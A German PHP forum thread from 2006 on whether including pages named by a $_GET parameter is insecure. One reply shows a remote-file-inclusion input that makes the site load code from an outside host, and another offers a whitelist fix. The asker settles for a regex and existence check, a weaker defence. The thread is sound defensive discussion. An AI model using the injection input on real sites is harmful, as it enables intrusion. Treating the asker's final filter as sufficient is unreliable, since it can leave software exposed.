Sicherheitslücke

guenterfrosch · 14.08.2006, 15:26

Hallo

Stellt es eine Sicherheitslücker dar, PHP-Dateien mit $_GET in Design zu includen? Also z.B. index.php?page=login.php

Ich habe einmal ein Artikel darüber gelesen, find diesen aber nicht mehr.

Ich bin auf der Suche nach Alternativen.

Danke

mkl0815 · 14.08.2006, 15:32

ja ist es.

da z.B. auch "index.php?page='http://meine.domain.de/boesercode.php'" funktioniert.
dieser code würde von deinem index.php eingebunden und ausgeführt werden.
somit kann man sehr einfach code eingeschleust werden.

guenterfrosch · 14.08.2006, 15:35

Welche Alternativen gibt es ohne eine Liste der zugelassenen Seiten erstellen zu müssen?

Guradia · 14.08.2006, 15:36

- Formate prüfen
- Protokolle ausschließen
- auf existenz prüfen
- etc. etc. ...

guenterfrosch · 14.08.2006, 15:39

Zitat:

Zitat von Guradia

- Formate prüfen
- Protokolle ausschließen
- auf existenz prüfen
- etc. etc. ...

Ich werde die angegebene Seite auf existenz prüfen.
Hätte ich auch selber drauf kommen können...

mkl0815 · 14.08.2006, 15:52

hmm wie wäre es mit einer indirekten lösung?
Datei "config.php":

PHP-Code:

  <?

$pagelist[1] = "main.php";

$pagelist[2] = "login.php";

$pagelist[3] = "content.php";

$pagelist[4] = "feedback.php";

?>

Links sehen dann so aus:
"index.php?page=1"

Den Parameter $page kannst Du sehr einfach überprüfen (kann nur Zahl sein) und dann ein

PHP-Code:

  include($pagelist[$_GET[page]]);

machen. Vorher natürlich ein

PHP-Code:

  include("config.php");

mario.

guenterfrosch · 14.08.2006, 15:58

Zitat:

Zitat von mkl0815

hmm wie wäre es mit einer indirekten lösung?
Datei "config.php":

PHP-Code:

  <?

$pagelist[1] = "main.php";

$pagelist[2] = "login.php";

$pagelist[3] = "content.php";

$pagelist[4] = "feedback.php";

?>

Links sehen dann so aus:
"index.php?page=1"

Den Parameter $page kannst Du sehr einfach überprüfen (kann nur Zahl sein) und dann ein

PHP-Code:

  include($pagelist[$_GET[page]]);

machen. Vorher natürlich ein

PHP-Code:

  include("config.php");

mario.

Leider ist mir diese Lösung zu aufwändig...
Ich überprüfe jetzt die GET-Variable mit einem Reuglären-Ausdruck. Falls die Variable passt, überprüfe ich noch die existenz dieser Datei. Ich denke diese Schutz sollte reichen...

Vielen Dank für eure Hilfe

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Thema bewerten
Thema bewerten:

14.08.2006, 15:26
guenterfrosch Benutzer Registriert seit: 27.04.2004 Beiträge: 50	Sicherheitslücke Hallo Stellt es eine Sicherheitslücker dar, PHP-Dateien mit $_GET in Design zu includen? Also z.B. index.php?page=login.php Ich habe einmal ein Artikel darüber gelesen, find diesen aber nicht mehr. Ich bin auf der Suche nach Alternativen. Danke


Mister Ad PHP Code Flüsterer Registriert seit: 21.08.2005 Beiträge: 4682 PHP-Kenntnisse: Fortgeschritten

14.08.2006, 15:32
mkl0815 Erfahrener Benutzer Registriert seit: 10.09.2004 Beiträge: 339	ja ist es. da z.B. auch "index.php?page='http://meine.domain.de/boesercode.php'" funktioniert. dieser code würde von deinem index.php eingebunden und ausgeführt werden. somit kann man sehr einfach code eingeschleust werden. __________________ Problems with Windows : REBOOT Problems with Linux : BE ROOT

14.08.2006, 15:35
guenterfrosch Benutzer Registriert seit: 27.04.2004 Beiträge: 50	Welche Alternativen gibt es ohne eine Liste der zugelassenen Seiten erstellen zu müssen?

14.08.2006, 15:36
Guradia Erfahrener Benutzer Registriert seit: 21.05.2008 Beiträge: 2.150	- Formate prüfen - Protokolle ausschließen - auf existenz prüfen - etc. etc. ...

14.08.2006, 15:52
mkl0815 Erfahrener Benutzer Registriert seit: 10.09.2004 Beiträge: 339	hmm wie wäre es mit einer indirekten lösung? Datei "config.php": PHP-Code: `<? $pagelist[1] = "main.php"; $pagelist[2] = "login.php"; $pagelist[3] = "content.php"; $pagelist[4] = "feedback.php"; ?>` Links sehen dann so aus: "index.php?page=1" Den Parameter $page kannst Du sehr einfach überprüfen (kann nur Zahl sein) und dann ein PHP-Code: `include($pagelist[$_GET[page]]);` machen. Vorher natürlich ein PHP-Code: `include("config.php");` mario.